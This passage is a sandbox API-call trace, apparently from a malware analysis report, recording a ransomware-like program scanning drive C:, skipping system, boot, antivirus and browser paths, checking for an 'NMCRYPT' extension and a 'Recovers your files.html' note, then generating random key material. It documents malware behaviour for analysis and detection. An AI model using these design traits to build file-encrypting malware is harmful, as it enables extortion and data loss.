(hObject=0x10d8) returned 1 [0165.233] WaitForSingleObject (hHandle=0x10ec, dwMilliseconds=0xffffffff) returned 0x0 [0165.233] CloseHandle (hObject=0x10ec) returned 1 [0165.233] WaitForSingleObject (hHandle=0x1100, dwMilliseconds=0xffffffff) returned 0x0 [0165.233] CloseHandle (hObject=0x1100) returned 1 [0165.233] WaitForSingleObject (hHandle=0x1114, dwMilliseconds=0xffffffff) returned 0x0 [0165.233] CloseHandle (hObject=0x1114) returned 1 [0165.233] WaitForSingleObject (hHandle=0x1128, dwMilliseconds=0xffffffff) returned 0x0 [0165.233] CloseHandle (hObject=0x1128) returned 1 [0165.233] WaitForSingleObject (hHandle=0x113c, dwMilliseconds=0xffffffff) returned 0x0 [0165.233] CloseHandle (hObject=0x113c) returned 1 [0165.233] WaitForSingleObject (hHandle=0x1150, dwMilliseconds=0xffffffff) returned 0x0 [0165.233] CloseHandle (hObject=0x1150) returned 1 [0165.233] WaitForSingleObject (hHandle=0x1164, dwMilliseconds=0xffffffff) returned 0x0 [0165.233] CloseHandle (hObject=0x1164) returned 1 [0165.233] WaitForSingleObject (hHandle=0x1178, dwMilliseconds=0xffffffff) returned 0x0 [0165.234] CloseHandle (hObject=0x1178) returned 1 [0165.234] WaitForSingleObject (hHandle=0x118c, dwMilliseconds=0xffffffff) returned 0x0 [0165.234] CloseHandle (hObject=0x118c) returned 1 [0165.234] WaitForSingleObject (hHandle=0x11a0, dwMilliseconds=0xffffffff) returned 0x0 [0165.234] CloseHandle (hObject=0x11a0) returned 1 [0165.234] WaitForSingleObject (hHandle=0x11b4, dwMilliseconds=0xffffffff) returned 0x0 [0165.234] CloseHandle (hObject=0x11b4) returned 1 [0165.234] WaitForSingleObject (hHandle=0x11c8, dwMilliseconds=0xffffffff) returned 0x0 [0165.234] CloseHandle (hObject=0x11c8) returned 1 [0165.234] WaitForSingleObject (hHandle=0x11dc, dwMilliseconds=0xffffffff) returned 0x0 [0165.234] CloseHandle (hObject=0x11dc) returned 1 [0165.234] WaitForSingleObject (hHandle=0x11f0, dwMilliseconds=0xffffffff) returned 0x0 [0165.234] CloseHandle (hObject=0x11f0) returned 1 [0165.234] WaitForSingleObject (hHandle=0x1204, dwMilliseconds=0xffffffff) returned 0x0 [0165.234] CloseHandle (hObject=0x1204) returned 1 [0165.234] WaitForSingleObject (hHandle=0x1218, dwMilliseconds=0xffffffff) returned 0x0 [0165.234] CloseHandle (hObject=0x1218) returned 1 [0165.234] WaitForSingleObject (hHandle=0x122c, dwMilliseconds=0xffffffff) returned 0x0 [0165.234] CloseHandle (hObject=0x122c) returned 1 [0165.234] WaitForSingleObject (hHandle=0x1240, dwMilliseconds=0xffffffff) returned 0x0 [0165.234] CloseHandle (hObject=0x1240) returned 1 [0165.234] WaitForSingleObject (hHandle=0x1254, dwMilliseconds=0xffffffff) returned 0x0 [0165.235] CloseHandle (hObject=0x1254) returned 1 [0165.235] WaitForSingleObject (hHandle=0x1268, dwMilliseconds=0xffffffff) returned 0x0 [0165.235] CloseHandle (hObject=0x1268) returned 1 [0165.235] WaitForSingleObject (hHandle=0x127c, dwMilliseconds=0xffffffff) returned 0x0 [0165.235] CloseHandle (hObject=0x127c) returned 1 [0165.235] WaitForSingleObject (hHandle=0x1290, dwMilliseconds=0xffffffff) returned 0x0 [0165.235] CloseHandle (hObject=0x1290) returned 1 [0165.235] WaitForSingleObject (hHandle=0x12a4, dwMilliseconds=0xffffffff) returned 0x0 [0165.235] CloseHandle (hObject=0x12a4) returned 1 [0165.235] WaitForSingleObject (hHandle=0x12b8, dwMilliseconds=0xffffffff) returned 0x0 [0165.235] CloseHandle (hObject=0x12b8) returned 1 [0165.235] WaitForSingleObject (hHandle=0x12cc, dwMilliseconds=0xffffffff) returned 0x0 [0165.235] CloseHandle (hObject=0x12cc) returned 1 [0165.235] WaitForSingleObject (hHandle=0x12e0, dwMilliseconds=0xffffffff) returned 0x0 [0165.235] CloseHandle (hObject=0x12e0) returned 1 [0165.235] WaitForSingleObject (hHandle=0x12f4, dwMilliseconds=0xffffffff) returned 0x0 [0165.235] CloseHandle (hObject=0x12f4) returned 1 [0165.235] WaitForSingleObject (hHandle=0x1308, dwMilliseconds=0xffffffff) returned 0x0 [0165.235] CloseHandle (hObject=0x1308) returned 1 [0165.235] WaitForSingleObject (hHandle=0x131c, dwMilliseconds=0xffffffff) returned 0x0 [0165.235] CloseHandle (hObject=0x131c) returned 1 [0165.235] WaitForSingleObject (hHandle=0x1330, dwMilliseconds=0xffffffff) returned 0x0 [0165.235] CloseHandle (hObject=0x1330) returned 1 [0165.236] WaitForSingleObject (hHandle=0x1344, dwMilliseconds=0xffffffff) returned 0x0 [0165.236] CloseHandle (hObject=0x1344) returned 1 [0165.236] WaitForSingleObject (hHandle=0x1358, dwMilliseconds=0xffffffff) returned 0x0 [0165.236] CloseHandle (hObject=0x1358) returned 1 [0165.236] WaitForSingleObject (hHandle=0x136c, dwMilliseconds=0xffffffff) returned 0x0 [0165.236] CloseHandle (hObject=0x136c) returned 1 [0165.236] WaitForSingleObject (hHandle=0x1380, dwMilliseconds=0xffffffff) returned 0x0 [0165.236] CloseHandle (hObject=0x1380) returned 1 [0165.236] WaitForSingleObject (hHandle=0x1394, dwMilliseconds=0xffffffff) returned 0x0 [0165.236] CloseHandle (hObject=0x1394) returned 1 [0165.236] WaitForSingleObject (hHandle=0x13a8, dwMilliseconds=0xffffffff) returned 0x0 [0165.236] CloseHandle (hObject=0x13a8) returned 1 [0165.236] WaitForSingleObject (hHandle=0x13bc, dwMilliseconds=0xffffffff) returned 0x0 [0165.236] CloseHandle (hObject=0x13bc) returned 1 [0165.236] WaitForSingleObject (hHandle=0x13d0, dwMilliseconds=0xffffffff) returned 0x0 [0165.236] CloseHandle (hObject=0x13d0) returned 1 [0165.236] WaitForSingleObject (hHandle=0x13e4, dwMilliseconds=0xffffffff) returned 0x0 [0165.236] CloseHandle (hObject=0x13e4) returned 1 [0165.236] WaitForSingleObject (hHandle=0x13f8, dwMilliseconds=0xffffffff) returned 0x0 [0165.236] CloseHandle (hObject=0x13f8) returned 1 [0165.236] WaitForSingleObject (hHandle=0x1410, dwMilliseconds=0xffffffff) returned 0x0 [0165.236] CloseHandle (hObject=0x1410) returned 1 [0165.237] WaitForSingleObject (hHandle=0x1424, dwMilliseconds=0xffffffff) returned 0x0 [0165.237] CloseHandle (hObject=0x1424) returned 1 [0165.237] WaitForSingleObject (hHandle=0x1438, dwMilliseconds=0xffffffff) returned 0x0 [0165.237] CloseHandle (hObject=0x1438) returned 1 [0165.237] WaitForSingleObject (hHandle=0x144c, dwMilliseconds=0xffffffff) returned 0x0 [0165.237] CloseHandle (hObject=0x144c) returned 1 [0165.237] WaitForSingleObject (hHandle=0x1460, dwMilliseconds=0xffffffff) returned 0x0 [0165.237] CloseHandle (hObject=0x1460) returned 1 [0165.237] WaitForSingleObject (hHandle=0x1474, dwMilliseconds=0xffffffff) returned 0x0 [0165.237] CloseHandle (hObject=0x1474) returned 1 [0165.237] WaitForSingleObject (hHandle=0x1488, dwMilliseconds=0xffffffff) returned 0x0 [0165.237] CloseHandle (hObject=0x1488) returned 1 [0165.237] WaitForSingleObject (hHandle=0x149c, dwMilliseconds=0xffffffff) returned 0x0 [0165.237] CloseHandle (hObject=0x149c) returned 1 [0165.237] WaitForSingleObject (hHandle=0x14b0, dwMilliseconds=0xffffffff) returned 0x0 [0165.237] CloseHandle (hObject=0x14b0) returned 1 [0165.237] WaitForSingleObject (hHandle=0x14c4, dwMilliseconds=0xffffffff) returned 0x0 [0165.237] CloseHandle (hObject=0x14c4) returned 1 [0165.237] WaitForSingleObject (hHandle=0x14d8, dwMilliseconds=0xffffffff) returned 0x0 [0165.237] CloseHandle (hObject=0x14d8) returned 1 [0165.237] WaitForSingleObject (hHandle=0x14ec, dwMilliseconds=0xffffffff) returned 0x0 [0165.237] CloseHandle (hObject=0x14ec) returned 1 [0165.238] WaitForSingleObject (hHandle=0x1500, dwMilliseconds=0xffffffff) returned 0x0 [0165.238] CloseHandle (hObject=0x1500) returned 1 [0165.238] WaitForSingleObject (hHandle=0x1514, dwMilliseconds=0xffffffff) returned 0x0 [0165.238] CloseHandle (hObject=0x1514) returned 1 [0165.238] WaitForSingleObject (hHandle=0x1528, dwMilliseconds=0xffffffff) returned 0x0 [0165.238] CloseHandle (hObject=0x1528) returned 1 [0165.238] WaitForSingleObject (hHandle=0x153c, dwMilliseconds=0xffffffff) returned 0x0 [0165.238] CloseHandle (hObject=0x153c) returned 1 [0165.238] WaitForSingleObject (hHandle=0x1550, dwMilliseconds=0xffffffff) returned 0x0 [0165.238] CloseHandle (hObject=0x1550) returned 1 [0165.238] WaitForSingleObject (hHandle=0x1564, dwMilliseconds=0xffffffff) returned 0x0 [0165.238] CloseHandle (hObject=0x1564) returned 1 [0165.238] WaitForSingleObject (hHandle=0x1578, dwMilliseconds=0xffffffff) returned 0x0 [0165.238] CloseHandle (hObject=0x1578) returned 1 [0165.238] WaitForSingleObject (hHandle=0x158c, dwMilliseconds=0xffffffff) returned 0x0 [0165.238] CloseHandle (hObject=0x158c) returned 1 [0165.238] WaitForSingleObject (hHandle=0x159c, dwMilliseconds=0xffffffff) returned 0x0 [0165.238] CloseHandle (hObject=0x159c) returned 1 [0165.238] WaitForSingleObject (hHandle=0x15b0, dwMilliseconds=0xffffffff) returned 0x0 [0165.238] CloseHandle (hObject=0x15b0) returned 1 [0165.238] WaitForSingleObject (hHandle=0x15c4, dwMilliseconds=0xffffffff) returned 0x0 [0165.238] CloseHandle (hObject=0x15c4) returned 1 [0165.239] WaitForSingleObject (hHandle=0x15d8, dwMilliseconds=0xffffffff) returned 0x0 Thread: id = 796 os_tid = 0x27c [0143.011] GetCurrentThreadId () returned 0x27c [0143.012] GetCurrentThreadId () returned 0x27c [0143.012] GetCurrentThreadId () returned 0x27c [0143.012] wcslen (_String="\\\\?\\") returned 0x4 [0143.012] wcslen (_String="\\") returned 0x1 [0143.012] wcslen (_String="Target directory ") returned 0x11 [0143.012] putwc (in: _Ch=0x54, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x54 [0143.012] putwc (in: _Ch=0x61, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x61 [0143.012] putwc (in: _Ch=0x72, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x72 [0143.012] putwc (in: _Ch=0x67, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x67 [0143.012] putwc (in: _Ch=0x65, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x65 [0143.012] putwc (in: _Ch=0x74, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x74 [0143.012] putwc (in: _Ch=0x20, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x20 [0143.012] putwc (in: _Ch=0x64, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x64 [0143.012] putwc (in: _Ch=0x69, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x69 [0143.012] putwc (in: _Ch=0x72, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x72 [0143.012] putwc (in: _Ch=0x65, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x65 [0143.012] putwc (in: _Ch=0x63, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x63 [0143.012] putwc (in: _Ch=0x74, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x74 [0143.012] putwc (in: _Ch=0x6f, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x6f [0143.012] putwc (in: _Ch=0x72, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x72 [0143.012] putwc (in: _Ch=0x79, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x79 [0143.012] putwc (in: _Ch=0x20, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x20 [0143.012] putwc (in: _Ch=0x43, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x43 [0143.012] putwc (in: _Ch=0x3a, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x3a [0143.012] wcslen (_String=" -> ") returned 0x4 [0143.012] putwc (in: _Ch=0x20, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x20 [0143.012] putwc (in: _Ch=0x2d, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x2d [0143.012] putwc (in: _Ch=0x3e, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x3e [0143.012] putwc (in: _Ch=0x20, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0x20 [0143.013] putwc (in: _Ch=0xa, _File=0x77ac1228 | out: _File=0x77ac1228) returned 0xa [0143.013] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned -1 [0143.013] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.013] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0143.013] wcslen (_String="\\*") returned 0x2 [0143.013] PathMatchSpecW (pszFile="C:\\*", pszSpec="*.exe") returned 0 [0143.013] PathMatchSpecW (pszFile="C:\\*", pszSpec="*.dll") returned 0 [0143.013] PathMatchSpecW (pszFile="C:\\*", pszSpec="*.lnk") returned 0 [0143.013] PathMatchSpecW (pszFile="C:\\*", pszSpec="*.bat") returned 0 [0143.013] PathMatchSpecW (pszFile="C:\\*", pszSpec="*.ini") returned 0 [0143.013] PathMatchSpecW (pszFile="C:\\*", pszSpec="*.msi") returned 0 [0143.013] PathMatchSpecW (pszFile="C:\\*", pszSpec="*.scf") returned 0 [0143.013] PathMatchSpecW (pszFile="C:\\*", pszSpec="*pagefile.sys*") returned 0 [0143.013] PathMatchSpecW (pszFile="C:\\*", pszSpec="*NTUSER.DAT*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*AppData*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*\\winrar\\*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*\\java\\*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*\\windows\\*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*\\ESET\\*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*\\AVG\\*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*\\AVIRA\\*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*Atheros*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*Realtek*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*bootmgr*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*boot*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*boot*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*CONFIG.SYS*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*IO.SYS*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*MSDOS.SYS*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*NTDETECT.COM*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*ntldr*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*chrome*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*opera*") returned 0 [0143.014] PathMatchSpecW (pszFile="C:\\*", pszSpec="*firefox*") returned 0 [0143.014] wcslen (_String="\\\\?\\") returned 0x4 [0143.014] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x2d7fc1c | out: lpFindFileData=0x2d7fc1c) returned 0x8c6b28 [0143.014] wcscmp (_String1="$Recycle.Bin", _String2=".") returned -1 [0143.014] wcscmp (_String1="$Recycle.Bin", _String2="..") returned -1 [0143.015] wcslen (_String="\\") returned 0x1 [0143.015] wcslen (_String="$Recycle.Bin") returned 0xc [0143.015] FindNextFileW (in: hFindFile=0x8c6b28, lpFindFileData=0x2d7fc1c | out: lpFindFileData=0x2d7fc1c) returned 1 [0143.015] wcscmp (_String1="Boot", _String2=".") returned 1 [0143.015] wcscmp (_String1="Boot", _String2="..") returned 1 [0143.015] wcslen (_String="\\") returned 0x1 [0143.015] wcslen (_String="Boot") returned 0x4 [0143.015] FindNextFileW (in: hFindFile=0x8c6b28, lpFindFileData=0x2d7fc1c | out: lpFindFileData=0x2d7fc1c) returned 1 [0143.015] PathMatchSpecW (pszFile="bootmgr", pszSpec="*NMCRYPT") returned 0 [0143.015] PathMatchSpecW (pszFile="bootmgr", pszSpec="*Recovers your files.html") returned 0 [0143.015] PathMatchSpecW (pszFile="bootmgr", pszSpec="*.exe") returned 0 [0143.015] PathMatchSpecW (pszFile="bootmgr", pszSpec="*.dll") returned 0 [0143.015] PathMatchSpecW (pszFile="bootmgr", pszSpec="*.lnk") returned 0 [0143.015] PathMatchSpecW (pszFile="bootmgr", pszSpec="*.bat") returned 0 [0143.015] PathMatchSpecW (pszFile="bootmgr", pszSpec="*.ini") returned 0 [0143.015] PathMatchSpecW (pszFile="bootmgr", pszSpec="*.msi") returned 0 [0143.015] PathMatchSpecW (pszFile="bootmgr", pszSpec="*.scf") returned 0 [0143.015] PathMatchSpecW (pszFile="bootmgr", pszSpec="*pagefile.sys*") returned 0 [0143.015] PathMatchSpecW (pszFile="bootmgr", pszSpec="*NTUSER.DAT*") returned 0 [0143.015] PathMatchSpecW (pszFile="bootmgr", pszSpec="*AppData*") returned 0 [0143.015] PathMatchSpecW (pszFile="bootmgr", pszSpec="*\\winrar\\*") returned 0 [0143.015] PathMatchSpecW (pszFile="bootmgr", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.016] PathMatchSpecW (pszFile="bootmgr", pszSpec="*\\java\\*") returned 0 [0143.016] PathMatchSpecW (pszFile="bootmgr", pszSpec="*\\TeamViewer\\*") returned 0 [0143.016] PathMatchSpecW (pszFile="bootmgr", pszSpec="*\\windows\\*") returned 0 [0143.016] PathMatchSpecW (pszFile="bootmgr", pszSpec="*\\ESET\\*") returned 0 [0143.016] PathMatchSpecW (pszFile="bootmgr", pszSpec="*\\AVG\\*") returned 0 [0143.016] PathMatchSpecW (pszFile="bootmgr", pszSpec="*\\AVIRA\\*") returned 0 [0143.016] PathMatchSpecW (pszFile="bootmgr", pszSpec="*\\AVAST Software\\*") returned 0 [0143.016] PathMatchSpecW (pszFile="bootmgr", pszSpec="*Atheros*") returned 0 [0143.016] PathMatchSpecW (pszFile="bootmgr", pszSpec="*Realtek*") returned 0 [0143.016] PathMatchSpecW (pszFile="bootmgr", pszSpec="*bootmgr*") returned 1 [0143.016] FindNextFileW (in: hFindFile=0x8c6b28, lpFindFileData=0x2d7fc1c | out: lpFindFileData=0x2d7fc1c) returned 1 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*NMCRYPT") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*Recovers your files.html") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*.exe") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*.dll") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*.lnk") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*.bat") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*.ini") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*.msi") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*.scf") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*pagefile.sys*") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*NTUSER.DAT*") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*AppData*") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*\\winrar\\*") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*\\java\\*") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*\\TeamViewer\\*") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*\\windows\\*") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*\\ESET\\*") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*\\AVG\\*") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*\\AVIRA\\*") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*\\AVAST Software\\*") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*Atheros*") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*Realtek*") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*bootmgr*") returned 0 [0143.016] PathMatchSpecW (pszFile="BOOTNXT", pszSpec="*boot*") returned 1 [0143.016] FindNextFileW (in: hFindFile=0x8c6b28, lpFindFileData=0x2d7fc1c | out: lpFindFileData=0x2d7fc1c) returned 1 [0143.016] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*NMCRYPT") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*Recovers your files.html") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*.exe") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*.dll") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*.lnk") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*.bat") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*.ini") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*.msi") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*.scf") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*pagefile.sys*") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*NTUSER.DAT*") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*AppData*") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*\\winrar\\*") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*\\java\\*") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*\\TeamViewer\\*") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*\\windows\\*") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*\\ESET\\*") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*\\AVG\\*") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*\\AVIRA\\*") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*\\AVAST Software\\*") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*Atheros*") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*Realtek*") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*bootmgr*") returned 0 [0143.017] PathMatchSpecW (pszFile="BOOTSECT.BAK", pszSpec="*boot*") returned 1 [0143.017] FindNextFileW (in: hFindFile=0x8c6b28, lpFindFileData=0x2d7fc1c | out: lpFindFileData=0x2d7fc1c) returned 1 [0143.017] wcscmp (_String1="Documents and Settings", _String2=".") returned 1 [0143.017] wcscmp (_String1="Documents and Settings", _String2="..") returned 1 [0143.017] wcslen (_String="\\") returned 0x1 [0143.017] wcslen (_String="Documents and Settings") returned 0x16 [0143.017] FindNextFileW (in: hFindFile=0x8c6b28, lpFindFileData=0x2d7fc1c | out: lpFindFileData=0x2d7fc1c) returned 1 [0143.017] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*NMCRYPT") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*Recovers your files.html") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*.exe") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*.dll") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*.lnk") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*.bat") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*.ini") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*.msi") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*.scf") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*pagefile.sys*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*NTUSER.DAT*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*AppData*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*\\winrar\\*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*\\Internet Explorer\\*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*\\java\\*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*\\TeamViewer\\*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*\\windows\\*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*\\ESET\\*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*\\AVG\\*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*\\AVIRA\\*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*\\AVAST Software\\*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*Atheros*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*Realtek*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*bootmgr*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*boot*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*boot*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*CONFIG.SYS*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*IO.SYS*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*MSDOS.SYS*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*NTDETECT.COM*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*ntldr*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*chrome*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*opera*") returned 0 [0143.018] PathMatchSpecW (pszFile="hiberfil.sys", pszSpec="*firefox*") returned 0 [0143.018] wcslen (_String="\\") returned 0x1 [0143.018] wcslen (_String="hiberfil.sys") returned 0xc [0143.019] PathMatchSpecW (pszFile="C:\\hiberfil.sys", pszSpec="*") returned 1 [0143.019] strlen (_Str="NMoreira") returned 0x8 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7f9b0 | out: pbBuffer=0x2d7f9b0) returned 1 [0143.019] CryptGenRandom 